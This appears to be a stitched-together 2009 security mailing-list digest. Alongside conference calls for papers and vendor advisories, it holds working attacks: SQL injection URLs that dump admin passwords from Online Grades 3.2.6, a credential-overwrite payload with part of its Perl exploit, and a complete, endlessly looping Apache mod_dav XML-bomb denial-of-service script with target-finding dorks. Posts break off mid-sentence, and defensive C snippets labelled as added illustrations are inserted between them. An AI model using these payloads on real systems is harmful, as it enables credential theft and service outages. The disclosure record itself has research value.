Technology development causes great changes in society and will determine our future. This category is for all talks on subjects like surveillance practices, censorship, hacker tools and the law, intellectual property and copyright issues, data retention, software patents, effects of technology on kids, and the impact of technology on society in general.

Hacking
-------

The Hacking category addresses topics dealing with technology, concentrating on current research with high technical merit. Traditionally, the majority of all lectures at 26C3 revolve around hacking. Topics in this domain include but are in no way limited to: programming, hardware hacking, cryptography, network and system security, security exploits, and creative use of technology.

Making
------

The Making category is all about making and breaking things and the wonderful stuff you can build in your basement or garage. Most welcome are submissions dealing with the latest in electronics, RepRaps, lasers, 3D-printing, climate-change survival technology, robots and flying UAVs, steam machines, alternative transportation tools, guerilla-style knitting, and wearable hardware hacks.

Science
-------

The Science category covers current or future objects of scientific research that have the potential to radically change our lives, be it basic research or projects conducted for the industry. We are looking for talks and papers on the state of the art in this domain, covering subjects such as nano technology, quantum computing, high frequency physics, bio-technology, brain-computer interfaces, genetic hacking and hackteria, automated analysis of surveillance cctv, map-making, psychogeography etc.

Culture
-------

Shaping the world we live in means making it more interesting, entertaining and beautiful. The hacker culture has many facets, ranging from electronic art objects, stand-up comedy, geek entertainment, video game and board game culture, electronically generated music, 3D art, and everything that bleeps and blinks to e-text literature and beyond. If you like to show your art and teach others how to make their lives more enjoyable, this category is for you.

Community
---------

In addition to individual speakers, the Chaos Communication Congress is also inviting groups such as developer teams, projects and activists to present themselves and their topics. Developer groups are also encouraged to ask for support to hold smaller on-site developer conferences and meetings in the course of the Congress.

Further Information
===================

The Chaos Communication Congress is a non-profit oriented event and speakers are not paid. However, financial help on travel expenses and accommodation is possible. It needs to be agreed upon after acceptance of the submission, though. Don't be shy and state your requirements in the application when submitting your lecture and we'll work something out!

You can find the preliminary agenda and additional information on our 26C3 website at http://events.ccc.de/congress/2009/. For further information and questions please feel free to contact 26C3-content (at) cccv.de

Submissions
===========

All proposals must be submitted online using our online lecture submission system at https://cccv.pentabarf.org/submission/26C3. Please follow the instructions given there. If you have any questions regarding your submission, feel free to contact us at 26C3-content (at) cccv.de but do NOT submit your lecture via e-mail.

Language
========

26C3 is an international event and we want to have a lot of interesting talks in English for the benefit of our growing number of international guests. So ideally we are looking for speakers who can give lectures and/or workshops in either English or German. But while we are interested in maximizing the quality of presentations, the topic and its
MULTIPLE SQL INJECTION VULNERABILITIES -- Online Grades Attendance v-3.2.6 --
-- MULTIPLE SQL INJECTION VULNERABILITIES -- Online Grades Attendance v-3.2.6 --

-- CMS INFORMATION:
--WEB: http://www.onlinegrades.org/
--DOWNLOAD: http://www.onlinegrades.org/
--DEMO: http://www.onlinegrades.org/demo_info
--CATEGORY: CMS / Education
--DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same features plus many new features. OG is a web based grade...
--RELEASED: 2009-02-05

CMS VULNERABILITY:
--TESTED ON: firefox 3
--DORK: Powered by Online Grades
--CATEGORY: SQL INJECTION
--AFFECT VERSION: = 3.2.6
--Discovered Bug date: 2009-05-21
--Reported Bug date: 2009-05-21
--Fixed bug date: Not fixed
--Info patch: Not fixed
--Author: YEnH4ckEr
--mail: y3nh4ck3r[at]gmail[dot]com
--WEB/BLOG: N/A
--COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
--EXTRA-COMMENT: Thanks to everyone for putting up with me! (Love you, sweetie!)

# SQL INJECTION (SQLi): #

--- PROOFS OF CONCEPT: ---

-++ Condition: magic quotes=OFF +-
-++ Condition: Be a registered user: Parent, Student or faculty ++-
[++] GET var -- 'ADD'
[++] File vuln -- 'parents.php'
~ http://[HOST]/[PATH]/parents/parents.php?func=mailto&ADD=-1%27+UNION+ALL+SELECT+user()%23

-++ Condition: magic quotes=OFF +-
[++] GET var -- 'key'
[++] File vuln -- 'index.php'
~ http://[HOST]/[PATH]/?action=resetpass&key=-1%27+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11%23

[++[Return]++] ~ user or version in DB.

-- EXPLOITS: --
~ http://[HOST]/[PATH]/parents/parents.php?func=mailto&ADD=-1%27+UNION+ALL+SELECT+concat(client_id,0x3A3A3A,client_pw)+FROM+ADMINS+WHERE+id=%271
~ http://[HOST]/[PATH]/?action=resetpass&key=-1%27+UNION+ALL+SELECT+1,concat(client_id,0x3A3A3A,client_pw),3,4,5,6,7,8,9,10,11+FROM+ADMINS+WHERE+id=1%23

[++[Return]++] ~ client_id:::client_pw in 'ADMINS' table

## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ##
## GREETZ TO: SPANISH H4ck3Rs community! ##
FRHACK 2009 Final Call For Papers extended
FRHACK 01, Besançon - France
2009 September 7-8 / 9-11
http://www.frhack.org
by hackers, for hackers

## Final Call For Papers ##

The Call For Papers for FRHACK 2009 is extended. The deadline for submissions is the 30th of June.

For more information, please visit http://frhack.org/cfp.php

Registration for Trainings/Workshops and the Conference is open: http://frhack.org/register.php

LinkedIn group: http://www.linkedin.com/groups?gid=1613377

See you soon for FRHACK!

Jerome Athias
Main organizer

Do you like good wine, French bread, food, strikes and the French kiss? If so, you will love FRHACK!
Re: MULTIPLE REMOTE VULNERABILITIES --Small Pirates v-2.1--
I'm sorry. This system is called Small Pirate, not Small Pirates. Mea culpa ;)
[SECURITY] [DSA 1808-1] New drupal6 packages fix insufficient input sanitising
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-1808-1                   secur...@debian.org
http://www.debian.org/security/                           Steffen Joeris
June 01, 2009                          http://www.debian.org/security/faq
- --

Package        : drupal6
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE ID         : no CVE id yet
Debian Bug     : 529190 531386

Markus Petrux discovered a cross-site scripting vulnerability in the taxonomy module of drupal6, a fully-featured content management framework. It is also possible that certain browsers using the UTF-7 encoding are vulnerable to a different cross-site scripting vulnerability.

For the stable distribution (lenny), these problems have been fixed in version 6.6-3lenny2.

The oldstable distribution (etch) does not contain drupal6.

For the testing distribution (squeeze) and the unstable distribution (sid), these problems have been fixed in version 6.11-1.1.

We recommend that you upgrade your drupal6 packages.

Upgrade instructions
- --

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny2.diff.gz
    Size/MD5 checksum:   21561 55998c89be8cde527e192e57b7c439d5
http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny2.dsc
    Size/MD5 checksum:    1132 7d8a825a0e670972ab6dd4ee98c341c4
http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6.orig.tar.gz
    Size/MD5 checksum: 1071507 caaa55d1990b34dee48f5047ce98e2bb

Architecture independent packages:

http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny2_all.deb
    Size/MD5 checksum: 1088692 fc0fd6e5d35869f6b8bc692fe7183248

These files will probably be moved into the stable distribution on its next update.

- -
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkoj58gACgkQ62zWxYk/rQfG7ACcCaIP6IqB4ZybMtiz37gWHZ1t
038An3zTZ4RP8FIBwAuBI5CrSzcCQLTL
=TsNN
-END PGP SIGNATURE-
ZDI-09-024: Safenet SoftRemote IKE Service Remote Stack Overflow Vulnerability
ZDI-09-024: Safenet SoftRemote IKE Service Remote Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-024
June 1, 2009

-- Affected Vendors:
Safenet

-- Affected Products:
Safenet SoftRemote

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6801. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Safenet SoftRemote IKE VPN service. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the ireIke.exe service listening on UDP port 62514. The process does not adequately handle long requests, resulting in a stack overflow. Exploitation can result in complete system compromise under the SYSTEM credentials.

-- Vendor Response:
Safenet states: The issue has been fixed in our release version 10.8.6; customers are advised to upgrade to this version.

-- Disclosure Timeline:
2008-10-28 - Vulnerability reported to vendor
2009-06-01 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Ruben Santamarta

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/
Zemana Antilogger 1.9.2 DoS attack
Severity: Critical
Title: Zemana Antilogger: Denial of Service
Date: May 30, 2009
Vers: 1.9.2.102
ID: 200905-30
StreAmeR - 2009
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========
A vulnerability has been discovered in Zemana Antilogger, allowing for a Denial of Service.

Background
==========
Zemana AntiLogger has a new, powerful way to protect your PC from malware attacks.

Affected packages
=================
Vers: 1.9.2.102 and older versions.

Description
===========
Attempts to terminate the process by sending Close messages (called WM_CLOSE and SC_CLOSE) to all windows in the target process. This method only works if 1) the target process has at least one window, and 2) the target process doesn't handle the WM_CLOSE/SC_CLOSE message.

Impact
======
An attacker could send specially crafted messages to the windows of the target process, resulting in a crash.

Workaround
==========
There is no known workaround at this time.

Resolution
==========
No current solution.
[USN-778-1] cron vulnerability
===========================================================
Ubuntu Security Notice USN-778-1                June 01, 2009
cron vulnerability
CVE-2006-2607
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  cron                            3.0pl1-92ubuntu1.1

Ubuntu 8.04 LTS:
  cron                            3.0pl1-100ubuntu2.1

Ubuntu 8.10:
  cron                            3.0pl1-104+ubuntu5.1

Ubuntu 9.04:
  cron                            3.0pl1-105ubuntu1.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

It was discovered that cron did not properly check the return code of the setgid() and initgroups() system calls. A local attacker could use this to escalate group privileges. Please note that cron versions 3.0pl1-64 and later were already patched to address the more serious setuid() check referred to by CVE-2006-2607.

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1.diff.gz
      Size/MD5:    49957 be99a97742618d1ee98841b007261478
    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1.dsc
      Size/MD5:      693 90bd74d44d50f316995ce641b5c1748f
    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1.orig.tar.gz
      Size/MD5:    59245 4c64aece846f8483daf440f8e3dd210f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_amd64.deb
      Size/MD5:    66132 3c3567e4041ca920f58aff3ec370785e

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_i386.deb
      Size/MD5:    60362 a4f44b8d8c9781053d8f545ebcde2011

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_powerpc.deb
      Size/MD5:    69354 b1c666c74fd2711fb0f942d57326333b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_sparc.deb
      Size/MD5:    61404 7bb09fbd5e5a2c8f479b2cb5296b6053

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1.diff.gz
      Size/MD5:    67887 a5af279d0b7acafd0d885707e2301a97
    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1.dsc
      Size/MD5:      795 3680f051b5bbaa54252da7d92f10f232
    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1.orig.tar.gz
      Size/MD5:    59245 4c64aece846f8483daf440f8e3dd210f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_amd64.deb
      Size/MD5:    83894 72449a38f5c3ce3b3716e386a1d1fd2f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_i386.deb
      Size/MD5:    79432 240d6d01e1d33d9d606c19780571b0d6

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_lpia.deb
      Size/MD5:    78234 ec5c95520d9e3e94a572c8095e976f0b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_powerpc.deb
      Size/MD5:    91154 5a110f1e1094522323f5773f39b10c93

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_sparc.deb
      Size/MD5:    81388 6f546235162b4c89bc247453418fadfa

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1.diff.gz
      Size/MD5:    69691 5dc135e1d9ffa07bf88a0d11cafad393
    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1.dsc
      Size/MD5:     1189 650b8107492613cab5713a594b3662e7
    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1.orig.tar.gz
      Size/MD5:    59245 4c64aece846f8483daf440f8e3dd210f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1_amd64.deb
      Size/MD5:    88220 889eec9f40f176e3eca03961b2eb6c02

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1_i386.deb
      Size/MD5:    83228 40aaf042c987c54d18d2dda7bd1d9b6c

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1_lpia.deb
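The check USN-778-1 describes, shown as an added C illustration rather than cron's source or Ubuntu's patch: a privilege drop in which every identity-changing call is checked and the outcome is verified afterwards, so a failed initgroups() or setgid() can never let a job run with the daemon's group identity. The function names, the `nobody` default and the use of glibc's initgroups(3) are assumptions.

```c
/* Added illustration of checked privilege dropping (not cron code).
 * Assumes POSIX/Linux with glibc and a caller that starts as root. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <errno.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Post-condition check: the process runs as exactly uid/gid and, when uid is
 * unprivileged, cannot get root back (a leftover saved uid 0 would allow it). */
int verify_dropped(uid_t uid, gid_t gid)
{
    if (getuid() != uid || geteuid() != uid)
        return -1;
    if (getgid() != gid || getegid() != gid)
        return -1;
    if (uid != 0 && setuid(0) == 0)
        return -1;                       /* should have failed with EPERM */
    return 0;
}

/* Switch to `user` (uid/gid). Supplementary groups and gid go first because
 * they need root; uid goes last. Each return code is checked: the unpatched
 * cron ignored initgroups()/setgid() failures, so a job whose group switch
 * failed kept the daemon's group identity, which is the escalation USN-778-1
 * describes. */
int drop_privileges(const char *user, uid_t uid, gid_t gid)
{
    if (initgroups(user, gid) != 0) {
        fprintf(stderr, "initgroups(%s): %s\n", user, strerror(errno));
        return -1;
    }
    if (setgid(gid) != 0) {
        fprintf(stderr, "setgid(%u): %s\n", (unsigned)gid, strerror(errno));
        return -1;
    }
    if (setuid(uid) != 0) {
        fprintf(stderr, "setuid(%u): %s\n", (unsigned)uid, strerror(errno));
        return -1;
    }
    return verify_dropped(uid, gid);
}

/* Usage: drop to an account given by name (placeholder default "nobody"). */
int main(int argc, char **argv)
{
    const char *user = argc > 1 ? argv[1] : "nobody";
    struct passwd *pw = getpwnam(user);
    if (pw == NULL) {
        fprintf(stderr, "unknown user %s\n", user);
        return 1;
    }
    if (drop_privileges(user, pw->pw_uid, pw->pw_gid) != 0)
        return 1;                        /* never run the job half-dropped */
    printf("now uid=%u gid=%u\n", (unsigned)getuid(), (unsigned)getgid());
    return 0;
}
```

The "try to regain root" step in verify_dropped() is the cheap runtime guard against the class of bug the notice describes: if any of the three calls silently failed, the job must not start at all, rather than start with whatever identity was left over.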
Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--
Why do you include "TESTED ON: firefox 3"? Would you not be able to trigger this bug using other browsers?

On Sun, May 31, 2009 at 8:53 PM, y3nh4c...@gmail.com wrote:

> #!/usr/bin/perl
> #---
> #(Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--
> #---
> #
> #CMS INFORMATION:
> #
> #--WEB: http://www.onlinegrades.org/
> #--DOWNLOAD: http://www.onlinegrades.org/
> #--DEMO: http://www.onlinegrades.org/demo_info
> #--CATEGORY: CMS / Education
> #--DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same
> #               features plus many new features. OG is a web based grade...
> #--RELEASED: 2009-02-05
> #
> #CMS VULNERABILITY:
> #
> #--TESTED ON: firefox 3
> #--DORK: Powered by Online Grades
> #--CATEGORY: SQL INJECTION
> #--AFFECT VERSION: <= 3.2.6
> #--Discovered Bug date: 2009-05-21
> #--Reported Bug date: 2009-05-21
> #--Fixed bug date: Not fixed
> #--Info patch: Not fixed
> #--Author: YEnH4ckEr
> #--mail: y3nh4ck3r[at]gmail[dot]com
> #--WEB/BLOG: N/A
> #--COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
> #--EXTRA-COMMENT: Thanks to all of you for putting up with me! (I love you, little one!)
> #
> #
> #
> #CONDITIONS:
> #
> #
> #gpc_magic_quotes=OFF
> #
> #-
> #PRE-REQUIREMENTS
> #-
> #
> #Option -- Self Registration -- Allowed (Default value)
> #
> #---
> #NEED:
> #---
> #
> #Valid parent id
> #
> #---
> #PROOF OF CONCEPT (SQL INJECTION):
> #---
> #
> #Register module (name) is vuln to sql injection.
> #
> #Full name -- y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'#
> #
> #Other parameters -- something
> #
> #
> #Return: Change client_id to 'owned' for parent id=1
> #
> #
> ###   ###
> ##***##
> ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...
> ##
> ##***##
> ##---##
> ##***##
> ## GREETZ TO: SPANISH H4ck3Rs community!
> ##
> ##***##
> ###   ###
> #
> #
> use LWP::UserAgent;
> use HTTP::Request;
>
> #Subroutines
>
> sub lw {
>     my $SO = $^O;
>     my $linux = "";
>     if (index(lc($SO), "win") != -1) {
>         $linux = 0;
>     } else {
>         $linux = 1;
>     }
>     if ($linux) {
>         system("clear");
>     } else {
>         system("cls");
>         system("title Online Grades Attendance v-3.2.6 (Credentials changer) Exploit");
>         system("color 02");
>     }
> }
>
> sub request {
>     my $userag = LWP::UserAgent->new;
>     $userag->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
>     if ($_[2] eq "post") {
>         $request = HTTP::Request->new(POST => $_[0]);
>         $request->referer($_[0]);
>         $request->content_type('application/x-www-form-urlencoded');
>         $request->content($_[1]);
>     } else {
>         $request = HTTP::Request->new(GET => $_[0]);
>     }
>     my $outcode = $userag->request($request)->as_string;
>     return $outcode;
> }
>
> sub error {
>     print "\t\n";
>     print "\tWeb isn't vulnerable!\n\n";
>     print "\t---Maybe:\n\n";
>     print "\t\t1.-Patched.\n";
>     print "\t\t2.-Bad path or host.\n";
>     print "\t\tEXPLOIT FAILED!\n";
>     print "\t\n";
> }
>
> sub errormagicquotes {
>     print "\t\n";
>     print "\tWeb isn't vulnerable!\n\n";
>     print "\t\tRaison-- Magic quotes ON.\n";
>     print "\t\tEXPLOIT FAILED!\n";
>     print "\t\n";
> }
>
> sub helper {
>     print "\n\t[!!!] Online Grades Attendance <= v-3.2.6 (Credentials changer) Exploit\n";
>     print "\t[!!!] USAGE MODE: [!!!]\n";
>     print "\t[!!!] perl $0 [HOST] [PATH] [Email Address] [Password] [Target_id]\n";
>     print "\t[!!!] [HOST]: Web.\n";
>     print "\t[!!!] [PATH]: Home Path.\n";
>     print "\t[!!!] [Email Address]: Set value\n";
>     print "\t[!!!] [Password]: Set value\n";
>     print "\t[!!!] [Target_id]: victim id\n";
Re: Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--
Of course not. I include this information to report in detail. Then... when do you need a browser to launch a perl exploit?

> Why do you include "TESTED ON: firefox 3"? Would you not be able to trigger this bug using other browsers?
>
> On Sun, May 31, 2009 at 8:53 PM, y3nh4ck3r (at) gmail (dot) com [email concealed] wrote:
The father of all bombs - another webdav fiasco
Apache mod_dav / svn Remote Denial of Service Exploit

Google Dorks: inurl:svn inurl:trunk "powered by subversion version"

Information on the bug (XML Bomb):
http://blog.didierstevens.com/2008/09/23/dismantling-an-xml-bomb/

Enjoy!

---

###apache-ied.pl
### Apache mod_dav / svn Remote Denial of Service Exploit
### by kcope / June 2009
###
### Will exhaust all system memory
### Needs Authentication on normal DAV
###
### This can be especially serious stuff when used against
### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##
use IO::Socket;
use MIME::Base64;

sub usage {
    print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
    print "by kcope in 2009\n";
    print "usage: perl apache-ied.pl <remotehost> <webdav folder> [username] [password]\n";
    print "example: perl apache-ied.pl svn.XXX.com /projects/\n";
    exit;
}

if ($#ARGV < 1) { usage(); }

$hostname   = $ARGV[0];
$webdavfile = $ARGV[1];
$username   = $ARGV[2];
$password   = $ARGV[3];
$| = 1;

$BasicAuth = encode_base64("$username:$password");
chomp $BasicAuth;

# First a plain PROPFIND, to confirm that the path answers with 207 Multi-Status
my $sock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => 80, Proto => 'tcp');
print $sock "PROPFIND $webdavfile HTTP/1.1\r\n";
print $sock "Host: $hostname\r\n";
print $sock "Depth: 0\r\n";
print $sock "Connection: close\r\n";
if ($username ne "") {
    print $sock "Authorization: Basic $BasicAuth\r\n";
}
print $sock "\r\n";
$x = <$sock>;
print $x;
if (!($x =~ /207/)) {
    while (<$sock>) { print; }
    close($sock);
    print "No PROPFIND on this server and path.\n";
    exit(0);
}

# Each entity expands to two copies of the previous one
$a = "";
for ($i = 1; $i < 256; $i++) {    # Here you can increase the XML bomb count
    $k = $i - 1;
    $a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n";
}
$igzml = "<?xml version=\"1.0\"?>\n"
       . "<!DOCTYPE REMOTE [\n"
       . "<!ELEMENT REMOTE ANY>\n"
       . "<!ENTITY x0 \"b4bew1thb1gb00bs\">\n"
       . $a
       . "]>\n"
       . "<REMOTE>\n"
       . "&x$k;\n"
       . "</REMOTE>\n";

print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "Launching DoS Attack...\n";

$ExploitRequest = "PROPFIND $webdavfile HTTP/1.1\r\n"
                . "Host: $hostname\r\n"
                . "Depth: 0\r\n";
if ($username ne "") {
    $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: " . length($igzml) . "\r\n\r\n" . $igzml;

while (1) {
again:
    my $sock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => 80, Proto => 'tcp') || (goto again);
    print $sock $ExploitRequest;
    print ";Pp";
}
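For the defending side of this post, an added C illustration (not Apache, mod_dav or Subversion code) of the pre-check a WebDAV front end can run on a PROPFIND body before it reaches a real XML parser: it parses only internal-subset <!ENTITY> declarations, rejects external entities and external DTDs outright, and estimates the expanded size against a byte budget in linear time, which catches the doubling chain apache-ied.pl builds as well as a cyclic or self-referencing entity. The entity limits, verdict codes and the constructed sample body are assumptions.

```c
/* Entity-expansion pre-check for XML request bodies such as WebDAV PROPFIND: an
 * added illustration for this digest, not Apache/mod_dav code; limits, names
 * and verdict codes are assumptions. */
#include <stddef.h>
#include <string.h>
#define MAX_ENTITIES 64
#define MEMO_UNSET (-2L)
enum { XML_OK = 0, XML_REJECT_DTD, XML_REJECT_DECL, XML_REJECT_EXPANSION };
struct entity { char name[32]; char value[256]; };

/* Collect <!ENTITY name "literal"> declarations located before `end`. Anything
 * else (SYSTEM/PUBLIC external entities, overlong names or values, too many
 * entities) returns -1 so the caller rejects the body. */
static int collect_entities(const char *dtd, const char *end, struct entity *out)
{
    int n = 0;
    const char *p = dtd, *endq;
    while ((p = strstr(p, "<!ENTITY")) != NULL && p < end) {
        size_t nlen, vlen;
        p += 8 + strspn(p + 8, " \t\r\n");
        nlen = strcspn(p, " \t\r\n");
        if (nlen == 0 || nlen >= sizeof(out[n].name) || n >= MAX_ENTITIES) return -1;
        memcpy(out[n].name, p, nlen);
        out[n].name[nlen] = '\0';
        p += nlen + strspn(p + nlen, " \t\r\n");
        if (*p != '"' && *p != '\'') return -1;
        endq = strchr(p + 1, *p);
        if (endq == NULL || (vlen = (size_t)(endq - p - 1)) >= sizeof(out[n].value)) return -1;
        memcpy(out[n].value, p + 1, vlen);
        out[n].value[vlen] = '\0';
        n++;
        p = endq + 1;
    }
    return n;
}

/* Expanded byte length of `text` with every reference resolved, or -1 once it
 * exceeds `budget`, nests deeper than 32, hits a cyclic entity or has a
 * malformed reference. memo[] caches each entity's full size, so a chain of N
 * doublings costs O(N) work here instead of the 2^N bytes a parser would build. */
static long expanded_len(const char *text, const struct entity *ents, int n,
                         long *memo, long budget, int depth)
{
    long total = 0;
    const char *p = text;
    if (depth > 32) return -1;
    while (*p != '\0') {
        if (*p == '&') {
            const char *semi = strchr(p, ';');
            size_t nlen;
            int i;
            if (semi == NULL) return -1;
            nlen = (size_t)(semi - p - 1);
            for (i = 0; i < n; i++)
                if (strlen(ents[i].name) == nlen && memcmp(ents[i].name, p + 1, nlen) == 0)
                    break;
            if (i == n) {                    /* &amp;, &#60; ...: counted as written */
                total += (long)nlen + 2;
            } else {
                if (memo[i] == MEMO_UNSET) {
                    memo[i] = -1;            /* "in progress": a cycle resolves to failure */
                    memo[i] = expanded_len(ents[i].value, ents, n, memo, budget, depth + 1);
                }
                if (memo[i] < 0) return -1;
                total += memo[i];
            }
            p = semi + 1;
        } else { total++; p++; }
        if (total > budget) return -1;
    }
    return total;
}

/* Verdict for one body. Without a DTD nothing can expand, so it is accepted;
 * otherwise the declarations are parsed and the post-DTD document is sized. */
int check_xml_body(const char *body, long budget)
{
    struct entity ents[MAX_ENTITIES];
    long memo[MAX_ENTITIES];
    const char *dtd = strstr(body, "<!DOCTYPE"), *content;
    int n, i;
    if (dtd == NULL) return XML_OK;
    content = strstr(dtd, "]>");
    if (content == NULL) return XML_REJECT_DTD;   /* external or unterminated DTD */
    n = collect_entities(dtd, content, ents);
    if (n < 0) return XML_REJECT_DECL;
    for (i = 0; i < n; i++) memo[i] = MEMO_UNSET;
    if (expanded_len(content + 2, ents, n, memo, budget, 0) < 0) return XML_REJECT_EXPANSION;
    return XML_OK;
}

/* Constructed sample: a three-step doubling chain in the shape apache-ied.pl
 * builds (the real one nests 256 levels). It expands to 99 bytes after the DTD. */
const char *SAMPLE_BOMB =
    "<?xml version=\"1.0\"?>\n"
    "<!DOCTYPE REMOTE [\n<!ELEMENT REMOTE ANY>\n"
    "<!ENTITY x0 \"aaaaaaaaaa\">\n"
    "<!ENTITY x1 \"&x0;&x0;\">\n"
    "<!ENTITY x2 \"&x1;&x1;\">\n"
    "<!ENTITY x3 \"&x2;&x2;\">\n"
    "]>\n<REMOTE>&x3;</REMOTE>\n";
```

A server would call check_xml_body() on the raw request body with a budget of a few megabytes and answer with a 4xx on anything but XML_OK. Refusing every body that contains <!DOCTYPE is an equally sound policy for WebDAV, since legitimate PROPFIND bodies do not carry one; the estimator is for endpoints that must accept a DTD and still want a bound on what the parser will materialise.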